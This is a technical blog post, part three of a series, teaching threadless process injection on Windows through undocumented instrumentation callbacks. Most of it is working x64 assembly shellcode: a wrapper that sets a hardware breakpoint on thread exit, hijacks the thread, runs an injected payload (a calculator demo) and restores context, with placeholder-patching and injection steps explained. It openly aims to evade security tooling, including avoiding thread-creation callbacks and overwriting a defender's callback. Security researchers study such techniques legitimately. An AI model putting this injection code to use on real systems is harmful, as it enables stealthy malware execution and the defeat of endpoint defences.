Windows Instrumentation Callbacks – Part 3

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second parts of this series, we strongly recommend you read them to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Disclaimer

This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
This series targets x64 programs on Windows 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
This post contains a lot of assembly code. Don’t be a script kiddie: take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this using the example of intercepting the syscall that OpenProcess makes inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven’t yet set an IC on another process, even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Because the IC is executed as a callback for every returning syscall, setting an IC on another process means getting code execution in that process’s context, which can be used for a process injection.

Process injection

If you have followed the blog series so far, you very likely know what a process injection is. Let’s break down what a regular process injection, that is, injecting code into another process, normally requires.

Every process has its own virtual address space, so an address that is valid in the injector means nothing in the victim. The code therefore first needs to be written into the other process. To write to the other process’s memory, you need a handle to the process with sufficient access rights, and you need to know where to write the code. For this you normally have two options: allocating memory in the other process or overwriting an existing executable memory region.

After the code has been written to an executable memory region, it needs to be executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms are, for example, API hooking, early bird APC injection or thread hijacking. There are many ways, but they all effectively just execute the written code. Several websites collect different execution mechanisms; however, most don’t include ICs.

While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. It briefly mentions using ICs for call stack analysis to detect injections, which is a great use case for them, but ICs can also be used for exactly what they are supposed to detect. That would also have the bonus effect of overwriting the defender’s IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint and how to protect against your own IC being overwritten.

I also found a blog post from 2020 by splinter_code about using ICs for process injections. Don’t worry, we will of course expand on that and not copy his work.

How complicated your IC injection code needs to be heavily depends on your payload. Assume, for example, that you only want to make a single WinExec call and your payload consists of about ten assembly instructions; this won’t add a massive overhead to the program. You could call the payload directly in the IC (assuming you added a way to prevent syscall recursion in the IC). But once you use a payload that does not return quickly, for example a C2 agent, the program will stop working or run into issues because a thread it requires was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks.

So, how do we execute code without spawning a new thread and without stalling the thread that triggered the IC for long? By instead spawning a process. Just kidding, let’s reuse the hooking method from the previous blog post and hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could also use page guards, for example.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a careful reader of the OpenProcess MSDN page might have noticed the following part: “If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor.” As said in the recap, we found out in the first blog post that the SeDebugPrivilege is required to set an IC on another process. Herein lies the fundamental “problem” of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means that the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that you need that privilege to test your injector, for example by launching the injector from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

Payload: This is the code that should get executed as the goal of the injection. In our case it will be a WinExec call that spawns a calculator. In your case it could be anything, for example a manual mapper that maps an entire DLL into the victim process.
Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic, just that it is this time injected into another process for the IC to execute there and not in its own process context. The wrapper remains static, only the payload changes.
Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not delve further into the build system, as we simply linked our C++ code with the assembly IC bridge; however, this isn’t what we will be doing this time. Both the payload and the payload wrapper need to be position-independent, as they won’t be executed in our process’s context but in the victim’s. This also means that we need both the starting address and the size of the assembled code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and then use a build system such as CMake with pre-compile steps that first assemble the file and then write the result to a C++ header file that simply contains a C++ array with the assembled bytes.

In other words: the CMakeLists.txt file contains multiple add_custom_command calls, which first execute the assembler (we’re using nasm), then use objcopy to copy the .text section of the object file into a temporary binary file and finally execute a Python script that reads the binary file and converts it into a C++ array. That array is written to a header file that is part of the CMake target’s sources. In this case, we only did this for the payload wrapper.
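To make the last step of that pipeline more tangible, here is a minimal sketch of the binary-to-header conversion. The series uses a Python script for this step; the C++ version below is only an illustration, and the function name to_cpp_header as well as the layout of the generated header (which needs C++17 for inline variables) are assumptions, not the script used for this post.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Hypothetical helper: renders raw shellcode bytes as the text of a C++
// header that defines a single byte array with the given name.
std::string to_cpp_header(const std::string& array_name,
                          const std::vector<std::uint8_t>& bytes) {
    assert(!array_name.empty() && !bytes.empty());
    std::string out = "#pragma once\n#include <cstdint>\n\n";
    out += "inline constexpr std::uint8_t " + array_name + "[] = {";
    for (std::size_t i = 0; i < bytes.size(); ++i) {
        if (i % 12 == 0) out += "\n    ";  // twelve bytes per line
        char buf[8];
        std::snprintf(buf, sizeof(buf), "0x%02x,",
                      static_cast<unsigned>(bytes[i]));
        out += buf;
        // Separate bytes on the same line with a single space
        if (i % 12 != 11 && i + 1 != bytes.size()) out += ' ';
    }
    out += "\n};\n";
    return out;
}
```

The injector can then include the generated header and take both the start address and the size of the shellcode from the array.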

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

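mov ecx, 0x636c6163 ; "calc" (little-endian); writing ecx zeroes the upper half of rcx
push rcx ; The string and its null terminator now live on the stack
mov rcx, rsp ; lpCmdLine
mov edx, 1 ; uCmdShow = SW_SHOWNORMAL
mov r14, 0x7fffffffffffffff ; will be replaced with WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30 ; 0x28 + the 8 bytes of the pushed string
ret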
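If the constant 0x636c6163 looks arbitrary, the following sketch models what "mov ecx, imm32" followed by "push rcx" leaves on the stack. It is a plain C++ model of the byte order, not part of the injector, and the helper names encode_imm32 and pushed_string are made up for this illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Packs up to four ASCII characters into the imm32 of "mov ecx, imm32" so
// that the first character ends up at the lowest address (little-endian).
std::uint32_t encode_imm32(const std::string& text) {
    assert(text.size() <= 4);
    std::uint32_t imm = 0;
    for (std::size_t i = 0; i < text.size(); ++i)
        imm |= static_cast<std::uint32_t>(
                   static_cast<unsigned char>(text[i])) << (8 * i);
    return imm;
}

// Models "mov ecx, imm32; push rcx" and returns the C string found at rsp.
std::string pushed_string(std::uint32_t imm32) {
    const std::uint64_t rcx = imm32;  // writing ecx zero-extends into rcx
    char slot[sizeof(rcx) + 1] = {};  // 8 stack bytes plus a safety terminator
    for (std::size_t i = 0; i < sizeof(rcx); ++i)
        slot[i] = static_cast<char>((rcx >> (8 * i)) & 0xFF);
    return std::string(slot);
}
```

The upper four bytes of rcx are zero, which is what terminates the four-character string without an extra instruction. Longer command lines would need more than one push or a string stored next to the code.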

Payload wrapper

So, what does the payload wrapper need to include? Everything required to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, which in our example would make multiple calculators pop up. That means that if we don’t unregister our IC after execution, we need a flag that signals when the payload has already been executed. As the payload should execute once in the entire process and not once per thread, this needs to be a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉

Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
  if (!payload_executed && !thread_set_hardware_bp) {
    thread_set_hardware_bp = true
    if (!set_hwbp(RtlExitUserThread)) // Does syscall
      thread_set_hardware_bp = false   
    return
  }
  if (!is_exception(ic_origin))
    return
  if (exception_origin() != RtlExitUserThread)
    return
  remove_hwbp(RtlExitUserThread) // Does syscall
  if (!payload_executed) {
    payload_executed = true 
    execute_payload() // (Most likely) does syscall
  }
  restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread-local flag, because the breakpoint flag doubles as the recursion guard. As long as the exception doesn’t come from our breakpoint, the only way for the IC to issue a syscall is through set_hwbp, which is why the flag is set before the function call and unset again if the breakpoint wasn’t set successfully.

This means that GetThreadContext and SetThreadContext, the two functions that issue a syscall down the line, trigger the IC again, but since those invocations aren’t caused by the expected exception, the IC simply returns.
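The decision logic of the pseudo code can also be modelled in ordinary C++, which makes it easy to step through the different IC invocations. This is only a simulation under simplifying assumptions: the types ProcessFlags, ThreadFlags and Trigger and the function on_callback are made up for this sketch, and it returns the action the real wrapper would take instead of performing it.

```cpp
#include <cassert>

enum class Action { SetBreakpoint, Ignore, RunPayloadThenRestore, RestoreOnly };

struct ProcessFlags { bool payload_executed = false; };  // one per process
struct ThreadFlags { bool hwbp_set = false; };            // one per thread

// Describes why the IC was invoked.
struct Trigger {
    bool is_exception;    // did we return into the exception dispatcher?
    bool at_thread_exit;  // is the exception address RtlExitUserThread?
};

Action on_callback(ProcessFlags& process, ThreadFlags& thread, Trigger t,
                   bool set_hwbp_succeeds = true) {
    // An exception address only exists if there was an exception at all
    assert(t.is_exception || !t.at_thread_exit);
    if (!process.payload_executed && !thread.hwbp_set) {
        // Set the flag first: set_hwbp issues syscalls that re-enter the IC
        thread.hwbp_set = true;
        if (!set_hwbp_succeeds)
            thread.hwbp_set = false;  // retry on the next IC invocation
        return Action::SetBreakpoint;
    }
    if (!t.is_exception || !t.at_thread_exit)
        return Action::Ignore;
    // The real wrapper removes the hardware breakpoint at this point
    if (!process.payload_executed) {
        process.payload_executed = true;
        return Action::RunPayloadThenRestore;
    }
    return Action::RestoreOnly;
}
```

With two simulated threads, both set a breakpoint on their first invocation, the first one that exits runs the payload and the second one only restores its context.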

A process-wide flag can be implemented by allocating memory with read and write permissions and using a fixed address inside it as the flag. As we want to avoid any RWX memory allocations, which are highly suspicious, we need two memory regions with different permissions: RW- for the flag and R-X for the code itself. This causes another issue: the flag address can’t be known at build time because the memory is allocated dynamically. If we allocated the flag memory from inside the injected code, we would only have the flag address during the IC call in which it was allocated; the code region isn’t writable, so there would be nowhere to store it.

Our solution is to use a placeholder address for the flag, just as with the WinExec address in the payload. The injector first allocates the memory for the flag, then searches for the placeholder inside the assembled wrapper (the array generated by the prebuild steps), replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.
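A minimal sketch of such a placeholder replacement could look as follows. The names to_le_bytes and patch_placeholder are hypothetical, and the sketch assumes that a placeholder value never occurs by accident elsewhere in the shellcode, which is worth checking for your own wrapper.

```cpp
#include <algorithm>
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Splits a 64-bit value into the byte order used by x64 immediates.
std::array<std::uint8_t, 8> to_le_bytes(std::uint64_t value) {
    std::array<std::uint8_t, 8> out{};
    for (std::size_t i = 0; i < out.size(); ++i)
        out[i] = static_cast<std::uint8_t>(value >> (8 * i));
    return out;
}

// Replaces every occurrence of `placeholder` in `code` with `value` and
// returns the number of replacements, so the caller can verify the count.
std::size_t patch_placeholder(std::vector<std::uint8_t>& code,
                              std::uint64_t placeholder,
                              std::uint64_t value) {
    const auto needle = to_le_bytes(placeholder);
    const auto replacement = to_le_bytes(value);
    std::size_t patched = 0;
    auto it = code.begin();
    while ((it = std::search(it, code.end(), needle.begin(), needle.end()))
           != code.end()) {
        // std::copy returns the position right behind the patched bytes
        it = std::copy(replacement.begin(), replacement.end(), it);
        ++patched;
    }
    return patched;
}
```

Returning the count is a deliberate choice: a result of zero means the placeholder was not found, and a placeholder that is used in several places should report exactly that many replacements.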

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique as in the previous blog post to hook RtlExitUserThread. This time, however, the code needs to be injected into the other process, meaning it has to be position-independent shellcode instead of a regular C++ function. This applies not only to setting the hardware breakpoint but to all the code that gets injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.

In C++ terms, the helper roughly does the following:

bool set_dr(DWORD64 bp_address, bool enable) {
  CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
  if (!GetThreadContext(GetCurrentThread(), &context))
    return false;
  context.Dr3 = bp_address;
  context.Dr7 &= ~DR3_MASK; // Clear Dr3's local enable, R/W and LEN bits
  if (enable)
    context.Dr7 |= 1ULL << 6; // Local enable for Dr3
  return SetThreadContext(GetCurrentThread(), &context);
}

The assembly below implements this. We hard-coded the usage of Dr3 for no specific reason; you could of course also use one of the other debug registers or add support for all of them.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: rax != 0 = success
; RSP needs to be 16-byte aligned before set_dr is called
set_dr:
    ; Save used non-volatile registers
    push r14
    push r13
    push rdi
    push rbx
    mov r13, rcx
    mov rbx, rdx
    sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
    mov rdi, rsp ; CONTEXT base
    mov r14, rdi ; rep stosq changes rdi, this is backup
    ; Zero CONTEXT struct
    mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
    xor rax, rax
    rep stosq
    ; CONTEXT_DEBUG_REGISTERS
    mov dword [r14 + 0x30], 0x00100010
    ; GetCurrentThread() == -2
    xor rcx, rcx
    dec rcx
    dec rcx
    ; The saved CONTEXT base
    mov rdx, r14
    ; Shadow space
    sub rsp, 0x20
    ; GetThreadContext placeholder
    mov rdi, 0x6CCCCCCCCCCCCCCC
    call rdi
    add rsp, 0x20 ; Shadow space
    ; if return value (BOOL in eax) == 0 it errored
    test eax, eax
    jz _set_dr_ret
    ; Set Dr3 (offsetof(CONTEXT, Dr3) = 0x60)
    mov qword [r14 + 0x60], r13
    ; offsetof(CONTEXT, Dr7) = 0x70
    mov rcx, [r14 + 0x70]
    ; Clear Dr3 specific bits: R/W3 (bits 28-29), LEN3 (bits 30-31), L3 (bit 6)
    ; 0x0FFFFFBF = ~((3 << 28) | (3 << 30) | (1 << 6)) as a 32-bit mask;
    ; the upper 32 bits of Dr7 are reserved, so a 32-bit AND is sufficient
    and ecx, 0x0FFFFFBF
    test rbx, rbx
    jz _skip_enable_bp
    ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)
    or rcx, (1 << 6)
  _skip_enable_bp:
    ; Dr7 = new Dr7
    mov [r14 + 0x70], rcx
    ; SetThreadContext
    xor rcx, rcx
    dec rcx
    dec rcx
    mov rdx, r14
    ; Shadow space
    sub rsp, 0x20
    ; SetThreadContext placeholder
    mov rdi, 0x5CCCCCCCCCCCCCCC
    call rdi
    add rsp, 0x20 ; Shadow space
  _set_dr_ret:
    add rsp, 0x4d8 ; + 8 alignment
    pop rbx
    pop rdi
    pop r13
    pop r14
    ret
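If you want to support all four debug registers instead of only Dr3, the Dr7 arithmetic generalizes nicely. The sketch below is an illustration in C++ rather than shellcode, and the function name update_dr7 is made up. It relies on the documented Dr7 layout: the local enable bit of register n sits at bit 2*n, and its R/W and LEN fields occupy the four bits starting at bit 16 + 4*n.

```cpp
#include <cassert>
#include <cstdint>

// Returns the new Dr7 value after enabling or disabling an execution
// breakpoint in debug register `index` (0..3). All bits that belong to
// other debug registers are left untouched.
std::uint64_t update_dr7(std::uint64_t dr7, unsigned index, bool enable) {
    assert(index < 4);
    const std::uint64_t local_enable = 1ull << (2 * index);
    // R/W (2 bits) and LEN (2 bits); both 0 select "break on execution"
    const std::uint64_t rw_and_len = 0xFull << (16 + 4 * index);
    dr7 &= ~(local_enable | rw_and_len);
    if (enable)
        dr7 |= local_enable;
    return dr7;
}
```

For Dr3 this clears bits 28 to 31 and toggles bit 6, so enabling the breakpoint on an otherwise empty Dr7 yields 0x40.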

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced at runtime by the injector. For the thread-local one, we will again use the Thread Environment Block. There are less suspicious ways of doing this.

load_bp_set_ptr_into_rcx:
  ; TEB (self pointer at gs:0x30; nasm expects the segment inside the brackets)
  mov rcx, [gs:0x30]
  ; TEB->InstrumentationCallbackDisabled 
  add rcx, 0x1b8
  ret
load_bitflag_into_rcx:
  ; rcx = pointer bit flag (placeholder currently)
  mov rcx, 0x2CCCCCCCCCCCCCCC
  ret

Execution logic

Looking back at the pseudo code, we have set_hwbp and remove_hwbp covered and also have access to the two flag variables through the helper functions, so let’s implement the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. The stack is not guaranteed to be 16-byte aligned when the IC is entered (sometimes RSP % 0x10 is 8 instead of 0). To avoid issues, we manually align the stack so that all Windows API calls and the payload call are made with a 16-byte aligned stack. So that the stack can be properly restored, we don’t simply overwrite RSP but instead push a marker value, which is checked when returning to find out whether the stack was adjusted.

entry:
  ; The actual return address of the IC
  push r10
  push r14
  mov r14, rsp
  add r14, 0x10
  push rax
  push rcx
  push rdx
  ; Rsp should be aligned for both cases, so it’s done here
  mov rdx, rsp
  and dl, 0xF
  cmp dl, 0x8
  jne _skip_align
  mov rdx, 0xDEADBEEF
  push rdx
_skip_align:
  call load_bp_set_ptr_into_rcx
  xor rax, rax
  ; Thread-local flag still 0: first IC call in this thread, go set the breakpoint
  cmp [rcx], rax
  je _hwbp_is_set
  ; Flag already set: "is_exception" check and payload execution
_hwbp_is_set:
; […]
_ret_unalign:
  ; Unalign rsp if it was previously modified
  cmp dword [rsp], 0xDEADBEEF
  jne _ret
  add rsp, 8
_ret:
  pop rdx
  pop rcx
  xor rcx, rcx
  pop rax
  pop r14
  ; r10 still on top of stack -> return to it
  ret
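The marker trick is easier to follow in a small model. The following C++ sketch simulates the prologue and epilogue on a fake stack; the Stack type and the helper names are invented for this illustration, and the model assumes that RSP is always a multiple of 8 on entry.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr std::uint64_t kAlignMarker = 0xDEADBEEF;

// Minimal stack model: rsp is the simulated stack pointer and slots holds
// the pushed qwords, with back() being the top of the stack.
struct Stack {
    std::uint64_t rsp;
    std::vector<std::uint64_t> slots;
    void push(std::uint64_t value) { rsp -= 8; slots.push_back(value); }
    std::uint64_t pop() {
        assert(!slots.empty());
        const std::uint64_t value = slots.back();
        slots.pop_back();
        rsp += 8;
        return value;
    }
};

// Mirrors the prologue: push the marker only if rsp is 8 bytes off.
void align(Stack& s) {
    if ((s.rsp & 0xF) == 0x8) s.push(kAlignMarker);
}

// Mirrors _ret_unalign: compare the low dword of the top slot with the
// marker and drop the slot if it matches.
void unalign(Stack& s) {
    if (!s.slots.empty() && (s.slots.back() & 0xFFFFFFFFull) == kAlignMarker)
        s.pop();
}
```

The design has one theoretical weakness that the model makes visible: if no marker was pushed and the saved rdx on top of the stack happens to end in 0xDEADBEEF, the epilogue would drop one slot too many. For a proof of concept this is an acceptable risk.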

First execution

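To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread. In the entry code, this is the branch to the _hwbp_is_set label; despite its name, it is reached while the thread-local flag is still unset. Let’s look at the relevant excerpt from the pseudo code: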

[…]
  if (!payload_executed && !thread_set_hardware_bp) {
    thread_set_hardware_bp = true
    if (!set_hwbp(RtlExitUserThread)) // Does syscall
      thread_set_hardware_bp = false   
    return
  }
[…]

The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, the check whether the payload was already executed, is missing. In addition to that check, we need to set the “breakpoint set” flag before setting the breakpoint, so that the syscalls made while setting it don’t send the IC down this path again. If setting the HWBP wasn’t successful, the flag is unset again.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
  call load_bitflag_into_rcx
  xor rax, rax
  inc rax
  ; Was payload already executed? If yes, don’t set BP
  cmp [rcx], rax
  je _ret_unalign
  ; Set BP set flag to avoid recursion
  call load_bp_set_ptr_into_rcx
  xor rax, rax
  inc rax
  ; bp set flag = 1
  mov [rcx], rax
  ; RtlExitUserThread placeholder
  mov rcx, 0x3CCCCCCCCCCCCCCC
  xor rdx, rdx
  inc rdx ; Enable hwbp
  call set_dr
  ; Succeeded (rax != 0)? Then we are done here
  test rax, rax
  jnz _ret_unalign
  ; Failed: bp set flag = 0 to retry on the next IC trigger
  call load_bp_set_ptr_into_rcx
  xor rax, rax
  mov [rcx], rax
  ; Fall through on purpose to return
_ret_unalign:
  ; […]

After HWBP was set

Let’s look back at the pseudo code to see what is still missing. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
  […]
  if (!is_exception(ic_origin))
    return
  if (exception_origin() != RtlExitUserThread)
    return
  remove_hwbp(RtlExitUserThread) // Does syscall
  if (!payload_executed) {
    payload_executed = true 
    execute_payload() // (Most likely) does syscall
  }
  restore_context()
}

We already implemented most of the required logic in the second part of this series, just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not explain again how we know that we need to intercept KiUserExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserExceptionDispatcher placeholder
    mov rcx, 0x4CCCCCCCCCCCCCCC
    cmp r10, rcx
    jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*, if it is a nullptr its bad :)
    test r14, r14
    jz _ret_unalign
    ; Exception thrown, but is it ours?
    ; RtlExitUserThread placeholder
    mov r10, 0x3CCCCCCCCCCCCCCC
    mov rcx, [r14+0xf8]
    cmp r10, rcx
    ; Not our exception
    jne _ret_unalign
    ; Unset bp
    xor rcx, rcx
    xor rdx, rdx
    call set_dr
    call load_bitflag_into_rcx
    ; Save context base
    push r14
    ; payload was already executed
    cmp qword [rcx], 1
    je _restore_context
    ; Set payload executed flag
    mov qword [rcx], 1
    sub rsp, 0x20
    call payload
    add rsp, 0x20
    ; as you can see, the payload needs to not mangle the stack
    ; otherwise it should call RtlExitUserThread itself
    ; if it mangled the stack rcx wouldn’t be the context base in the next line
_restore_context:
    ; Restore context base to rcx     
    pop rcx
    ; Set ResumeFlag in EFlags register
    or dword [rcx+0x44], 0x10000
    ; ExceptionRecord = nullptr
    xor rdx, rdx
    ; Call RtlRestoreContext
    sub rsp, 0x20
    mov rdi, 0x8CCCCCCCCCCCCCCC
    call rdi
    ; RtlRestoreContext doesn’t return

If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.
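On the injector side, "adding the byte arrays to each other" can be as simple as the following sketch. The type WrappedPayload and the function wrap are hypothetical names, and the sketch assumes that the assembled wrapper ends exactly at the payload label, without trailing padding bytes.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct WrappedPayload {
    std::vector<std::uint8_t> bytes;  // wrapper directly followed by payload
    std::size_t payload_offset;       // where the payload label ends up
};

// Appends the payload to the wrapper. The wrapper's relative call to the
// payload label then lands on the first payload byte.
WrappedPayload wrap(const std::vector<std::uint8_t>& wrapper,
                    const std::vector<std::uint8_t>& payload) {
    assert(!wrapper.empty() && !payload.empty());
    WrappedPayload out;
    out.bytes.reserve(wrapper.size() + payload.size());
    out.bytes = wrapper;
    out.bytes.insert(out.bytes.end(), payload.begin(), payload.end());
    out.payload_offset = wrapper.size();
    return out;
}
```

Because the call uses a relative displacement, the combined array can be written to any address in the victim process, as long as both parts stay adjacent.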

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Speaking of which, the blog post is already pretty long, so we’ve decided not to add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will see that you need to replace the placeholders 0x2CCCCCCCCCCCCCCC through 0x8CCCCCCCCCCCCCCC. Each placeholder is commented with the function it requires. The flag placeholder simply requires an 8-byte allocation with read and write permissions in the target process, as the wrapper accesses the flag as a qword.

After replacing the placeholders and combining wrapper and payload into one array/vector, that data needs to be written to an executable memory region in the victim process. This requires an open handle that allows memory writes and, if any allocations are done, memory allocations. After the shellcode has been copied over, an IC needs to be set on the other process, with the callback pointing to the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access right is required. Keep in mind that you need the SeDebugPrivilege to set an IC on another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge ICs are the most powerful feature of Windows usable in user mode. In general, we only covered a fraction of what is possible with ICs, for example we haven’t covered getting callbacks to APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.
